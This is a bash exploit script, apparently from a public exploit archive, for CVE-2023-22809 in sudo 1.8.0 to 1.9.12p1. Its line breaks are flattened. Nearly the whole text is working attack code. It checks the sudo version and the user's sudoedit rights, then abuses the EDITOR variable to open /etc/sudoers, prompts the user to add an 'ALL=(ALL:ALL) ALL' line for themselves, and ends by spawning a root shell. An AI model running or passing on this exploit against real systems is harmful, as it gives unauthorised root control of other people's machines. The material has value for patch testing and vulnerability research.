#!/usr/bin/env bash# Exploit Title: sudo 1.8.0 to 1.9.12p1 - Privilege Escalation# Exploit Author: n3m1.sys# CVE: CVE-2023-22809# Date: 2023/01/21# Vendor Homepage: https://www.sudo.ws/# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz# Version: 1.8.0 to 1.9.12p1# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9## Git repository: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc## Running this exploit on a vulnerable system allows a localiattacker to gain # a root shell on the machine.## The exploit checks if the current user has privileges to run sudoedit or # sudo -e on a file as root. If so it will open the sudoers file for the# attacker to add a line to gain privileges on all the files and get a root # shell.if!sudo--version|head-1|grep-qE'(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'thenecho"> Currently installed sudo version is not vulnerable"exit1fiEXPLOITABLE=$(sudo-l|grep-E"sudoedit|sudo -e"|grep-E'\(root\)|\(ALL\)|\(ALL : ALL\)'|cut-d ')' -f2-)if[-z"$EXPLOITABLE"];thenecho"> It doesn't seem that this user can run sudoedit as root"read-p"Do you want to proceed anyway? (y/N): " confirm &&[[$confirm==[yY]]]||exit2elseecho"> BINGO! User exploitable"echo"> Opening sudoers file, please add the following line to the file in order to do the privesc:"echo"$(whoami) ALL=(ALL:ALL) ALL"read-n1-s-r-p"Press any key to continue..."EDITOR="vim -- /etc/sudoers"$EXPLOITABLEsudosu root
exit0fi
